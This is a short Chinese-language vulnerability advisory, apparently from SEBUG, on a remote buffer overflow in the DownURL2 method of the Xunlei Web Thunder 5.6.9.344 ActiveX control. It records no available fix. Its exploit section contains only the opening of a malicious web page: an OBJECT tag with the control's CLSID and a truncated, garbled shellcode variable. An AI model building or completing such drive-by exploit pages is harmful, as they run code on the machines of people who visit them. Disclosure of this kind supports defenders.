Xunlei Web Thunder是一款在线加速下载程序。
Xunlei Web Thunder提供的ActiveX控件存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
问题存在于DownURL2方法处理中,由于对参数缺少充分过滤,构建恶意WEB页,诱使用户访问,可导致以应用程序权限执行任意指令。
Xunlei Web Thunder ActiveX控件DownURL2方法远程缓冲区溢出漏洞
Published:2007-09-18
Vulnerable:
Xunlei Web Thunder 5.6.9.344
Discription:
<*References
Thunder 5.6.9.344 ActiveX 0day Remote Code Execution*>
SEBUG Solution:
目前没有解决方案提供:
http://my.xunlei.com/setup.htm
http://my.xunlei.com/setup.htm
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
<OBJECT id=target classid=clsid: EEDD6FF9-13DE-496B-9A1C-D78B3215E266></OBJECT>
<SCRIPT language=javascript>
var she132132132132llc13ode = un
// Sebug.net [ 2007-09-22 ]